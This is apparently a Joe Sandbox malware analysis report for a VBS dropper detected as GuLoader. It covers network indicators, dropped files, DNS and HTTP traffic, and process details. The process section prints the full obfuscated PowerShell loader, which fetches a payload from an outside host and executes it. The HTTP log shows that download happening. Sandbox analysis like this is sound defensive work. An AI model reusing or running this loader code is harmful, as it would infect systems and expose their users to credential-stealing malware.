http://crl.micro_ | powershell.exe, 00000006.00000002.2988349216.000000000732E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000003.00000002.1849596951.0000021A991F1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.1849596951.0000021A991F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2970700817.00000000046E1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.2970700817.0000000004835000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
103.53.42.63 | ftsengineers.com | India | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1571032
                                          Start date and time:2024-12-08 19:26:03 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 4m 59s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:11
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:S1a5ZF3ytp.vbs
                                          renamed because original name is a hash value
                                          Original Sample Name:3f18b6b6686858e2d1707d38224c41129329efae694b883ac1cffa7617e30568.vbs
                                          Detection:MAL
                                          Classification:mal100.troj.expl.evad.winVBS@9/9@2/1
                                          EGA Information:Failed
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 70
                                          • Number of non-executed functions: 13
                                          Cookbook Comments:
                                          • Found application associated with file extension: .vbs
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded IPs from analysis (whitelisted): 2.22.50.144, 2.22.50.131, 2.22.50.151
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                          • Execution Graph export aborted for target powershell.exe, PID 1732 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 6640 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: S1a5ZF3ytp.vbs
Timeline (Time | Type | Description):
13:26:56 | API Interceptor | 1x Sleep call for process: wscript.exe modified
13:26:56 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
13:26:59 | API Interceptor | 87x Sleep call for process: powershell.exe modified
13:28:35 | API Interceptor | 1475x Sleep call for process: conhost.exe modified
Context by IP 103.53.42.63 (Associated Sample Name / URL | Detection | Threat Name):
List of required items pdf.vbs | malicious | GuLoader
List of required items and services pdf.vbs | malicious | GuLoader
https://2itchyfeets.com | malicious | Unknown
http://2itchyfeets.com | malicious | Unknown
Linux_x86 | malicious | Unknown

Context by ASN PUBLIC-DOMAIN-REGISTRYUS (Associated Sample Name / URL | Detection | Threat Name | Context IP):
List of required items pdf.vbs | malicious | GuLoader | 103.53.42.63
List of required items and services pdf.vbs | malicious | GuLoader | 103.53.42.63
h0UP1BcPk5.lnk | malicious | Unknown | 216.10.240.70
Ti5nuRV7y4.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 119.18.54.39
m30zZYga23.exe | malicious | AgentTesla | 208.91.199.223
PO82200487.exe | malicious | AgentTesla | 199.79.62.115
ORDER#023_2024.exe | malicious | AgentTesla | 199.79.62.115
QFEWElNtpn.exe | malicious | AgentTesla | 199.79.62.115
SoA_14000048_002.exe | malicious | AgentTesla | 199.79.62.115
Quote 000002320.exe | malicious | AgentTesla | 199.79.62.115

Context by JA3 fingerprint 3b5074b1b5d032e5620f69f9f700ff0e (Associated Sample Name / URL | Detection | Threat Name | Context IP):
file.exe | malicious | Amadey, LummaC Stealer | 103.53.42.63
file.exe | malicious | Amadey, Stealc, Vidar | 103.53.42.63
file.exe | malicious | LummaC Stealer | 103.53.42.63
file.exe | malicious | Quasar | 103.53.42.63
file.exe | malicious | Amadey, Stealc, Vidar | 103.53.42.63
ugjigghFzZ.exe | malicious | Quasar | 103.53.42.63
spoolsv.exe | malicious | RedLine, StormKitty, XWorm | 103.53.42.63
2477.exe | malicious | NoCry, RedLine, StormKitty, XWorm | 103.53.42.63
BA9qyj2c9G.exe | malicious | WhiteSnake Stealer | 103.53.42.63
List of required items pdf.vbs | malicious | GuLoader | 103.53.42.63

No context
                                                    Process:C:\Windows\System32\wscript.exe
                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                    Category:dropped
                                                    Size (bytes):71954
                                                    Entropy (8bit):7.996617769952133
                                                    Encrypted:true
                                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Process:C:\Windows\System32\wscript.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):328
                                                    Entropy (8bit):3.150184159866505
                                                    Encrypted:false
                                                    SSDEEP:6:kKr0kD9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:T0VDnLNkPlE99SNxAhUe/3
                                                    MD5:FD4EE41AFDA537C055105CD8BA8CA05D
                                                    SHA1:6EF258AD500500FA983545B3F9E4B5B1CC7D02A1
                                                    SHA-256:5CDBE19BCCC67C66C36BED208A86F9E8FE5E6E6C30508945F3C221ACE94D6E51
                                                    SHA-512:89527C60C3D1671CA79A243AC5E92C6A7BD100A2AAAFFBC4220A2A181DFEF6D73FD7A0F3550E1C4775ED14A5417AD7013B52E047AF076B97E25683F52959E17B
                                                    Malicious:false
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):8003
                                                    Entropy (8bit):4.840877972214509
                                                    Encrypted:false
                                                    SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                    MD5:106D01F562D751E62B702803895E93E0
                                                    SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                    SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                    SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                    Malicious:false
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1940658735648508
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                    MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                    SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                    SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                    SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                    Malicious:false
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):461264
                                                    Entropy (8bit):5.935880013697424
                                                    Encrypted:false
                                                    SSDEEP:12288:0KGK4Xd7QbEgkdEmXP5PM6wE3JiA7qYsO:0KG5Rjr/5UgJiqTx
                                                    MD5:A8D8FCD4EF4917F1C14562FBC14861BA
                                                    SHA1:0A73116E9BF6E750E9543A8C7AE7D19EFD95F863
                                                    SHA-256:07A1CF471F5FB3A1EA9DB9C67056F8CD2A8DE02B1B2B9490465F130B674997AE
                                                    SHA-512:BD8AAFBEF5C86FF81854C1FDF2EA679DD58BEDEDD81A86430DE6B172BB5152EB07CD80603D29B4DA340959CAE85193D65C89489DA0A2282DAF96232E950E802A
                                                    Malicious:false
                                                    File type:ASCII text, with CRLF line terminators
                                                    Entropy (8bit):5.30019669839314
                                                    TrID:
                                                    • Visual Basic Script (13500/0) 100.00%
                                                    File name:S1a5ZF3ytp.vbs
                                                    File size:30'011 bytes
                                                    MD5:1a749c44eb48b9cdddcdd8e00a6bd866
                                                    SHA1:555ed2c58801e005bba67f38174006eb1a1ff31d
                                                    SHA256:3f18b6b6686858e2d1707d38224c41129329efae694b883ac1cffa7617e30568
                                                    SHA512:06e8648387dd9a0c53dd2cba0dbe17106b4e1087ff6e39022bef9d6cbf101f2cbd15448dfd308c8b110fc77e068aabed3054e3c3f6fee753f19c5de003055fc3
                                                    SSDEEP:384:NDQrl7+NIlfvinb5lgsZ2kzBv1yxJwbZoDEZQD6XjyVT:xK7Plnib5l15dNyxJwlotDueh
                                                    TLSH:A4D2F6655F8735012587F272CCEE1936BD88427206E134603CE5E35407CAABA77BDDEA
                                                    File Content Preview:....'mazurkaerne indkringsfase reflexives243! triptllers, realisationsprisen35!..........Set Udpeges = CreateObject("HNetCfg.FwMgr")....Set sowle = Udpeges.LocalPolicy.CurrentProfile....'Guruernes artikulatoriskes sparringpartneres lydside:..Set Ecbatic =
                                                    Icon Hash:68d69b8f86ab9a86
                                                    Timestamp                          Source Port  Dest Port  Source IP    Dest IP
                                                    Dec 8, 2024 19:27:00.047355890 CET 54961        53         192.168.2.4  1.1.1.1
                                                    Dec 8, 2024 19:27:01.051575899 CET 54961        53         192.168.2.4  1.1.1.1
                                                    Dec 8, 2024 19:27:01.130376101 CET 53           54961      1.1.1.1      192.168.2.4
                                                    Dec 8, 2024 19:27:01.188755035 CET 53           54961      1.1.1.1      192.168.2.4
                                                    Timestamp                          Source IP    Dest IP  Trans ID  OP Code             Name                  Type            Class        DNS over HTTPS
                                                    Dec 8, 2024 19:27:00.047355890 CET 192.168.2.4  1.1.1.1  0xd3a6    Standard query (0)  www.ftsengineers.com  A (IP address)  IN (0x0001)  false
                                                    Dec 8, 2024 19:27:01.051575899 CET 192.168.2.4  1.1.1.1  0xd3a6    Standard query (0)  www.ftsengineers.com  A (IP address)  IN (0x0001)  false
                                                    Timestamp                          Source IP  Dest IP      Trans ID  Reply Code    Name                  CName             Address       Type                    Class        DNS over HTTPS
                                                    Dec 8, 2024 19:27:01.130376101 CET 1.1.1.1    192.168.2.4  0xd3a6    No error (0)  www.ftsengineers.com  ftsengineers.com  -             CNAME (Canonical name)  IN (0x0001)  false
                                                    Dec 8, 2024 19:27:01.130376101 CET 1.1.1.1    192.168.2.4  0xd3a6    No error (0)  ftsengineers.com      -                 103.53.42.63  A (IP address)          IN (0x0001)  false
                                                    Dec 8, 2024 19:27:01.188755035 CET 1.1.1.1    192.168.2.4  0xd3a6    No error (0)  www.ftsengineers.com  ftsengineers.com  -             CNAME (Canonical name)  IN (0x0001)  false
                                                    Dec 8, 2024 19:27:01.188755035 CET 1.1.1.1    192.168.2.4  0xd3a6    No error (0)  ftsengineers.com      -                 103.53.42.63  A (IP address)          IN (0x0001)  false
                                                    • www.ftsengineers.com
                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    0           192.168.2.4  49731        103.53.42.63    443               1732  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Timestamp                Bytes transferred  Direction  Data
                                                    2024-12-08 18:27:03 UTC  183                OUT        GET /km/microcheilia.dwp HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: www.ftsengineers.com
                                                    Connection: Keep-Alive
                                                    2024-12-08 18:27:03 UTC  209                IN         HTTP/1.1 200 OK
                                                    Date: Sun, 08 Dec 2024 18:27:03 GMT
                                                    Server: Apache
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Last-Modified: Fri, 06 Dec 2024 00:37:29 GMT
                                                    Accept-Ranges: bytes
                                                    Content-Length: 461264


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:13:26:53
                                                    Start date:08/12/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs"
                                                    Imagebase:0x7ff68bad0000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:1
                                                    Start time:13:26:56
                                                    Start date:08/12/2024
                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:wmic diskdrive get caption,serialnumber
                                                    Imagebase:0x7ff687fc0000
                                                    File size:576'000 bytes
                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:13:26:56
                                                    Start date:08/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:13:26:57
                                                    Start date:08/12/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. 
rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . 
.DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLoiUnsBusmo=Se$FoTreoA k.eo tmTrpUmoT.nPaeBenVktEne es') ;Containeriseringers $Netmave;Containeriseringers (Tilbageholdte ' ,sSaTFaaAvRUftTi- s gl.aEPeeBiPPl oo4');Containeriseringers (Tilbageholdte 'Ud$ aGRiL .oNabTyA olAn:BeI NnUrGd Eb f eR SMVgA prB mutE,el,oa DDiEB =K.(G TOmESkSbrt .- apBrA iTQuh , ,$ dIslN BDVao rpLyhOxeP nw iPln u)') ;Containeriseringers (Tilbageholdte 'F.$AfgPelCloL bSpaS,LE :LoFP,oBor HfA jU,ETir SDG iGuNS,GAce arBa=Gr$JyG olCooA b .ALvLM : oPWao SI GnFiTD,w.eaG yStS ,+ X+ e%I $HoLPra GG dRM iPoN uGTes.rF WO hrunMB 3 l7Wo.UnC lOKnUUfn Kt') ;$Automatteoriens=$Lagringsform37[$Forfjerdinger]}$Agrees=317274;$Unanalytic=28672;Containeriseringers (Tilbageholdte 'W $GaGStlTeo rbMyA.il n:,dS atPrRVeA AIEjnDiS . Un=,c TgFeEC T c-,oC TO,aN,aTSeeToN .TYa Ve$PaIFiN PDTrO UpS H ESknHyIEnN');Containeriseringers (Tilbageholdte 'Ra$ cgLil aoStbm a DlBa:Unl CuOvfVbtDuaScn,egSur e UbSesRe i= F C [EkS yT.sFitSleVamAf.DiCBeo Un vF.e MrRytW ]Un:Fe:D FTor aoP,m,eBK,aThs Cepl6Pl4.rSdit TrW,iSunuogS (,k$ iSBatWrr aGriHenS s B)');Containeriseringers (Tilbageholdte 'On$ AgEvLFoOTrbHea lSu: eT nS,oPlm ,A BNIrI oa,a El= S N [.rS oyCos itStEEvMMi.,rT peunXBlT f.n ECaN c Go ADScISpN.ogPi]In:H.:Spa Rs CCStiOciEm.IngdiEIsTI sSutParAniklnReGun(Uf$OvLPruVoF AtAmapanTaGYarNge ibIdS ,)');Containeriseringers (Tilbageholdte ' I$ OGUnlPaOTibA a AlEk:F a ocHaOOpRS N ,S.k= S$KieRun ,O SM,pa Ln II ha s.MosS,UReb SVatBaRVai Dn Ug,a(Mo$ oaGaG,rr OEMuE.is , B$S U nkuAHan SaStLS y LTDeiFoCB,)');Containeriseringers $Acorns;"
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.1874103061.0000021AA9260000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:13:26:57
                                                    Start date:08/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:13:27:11
                                                    Start date:08/12/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. 
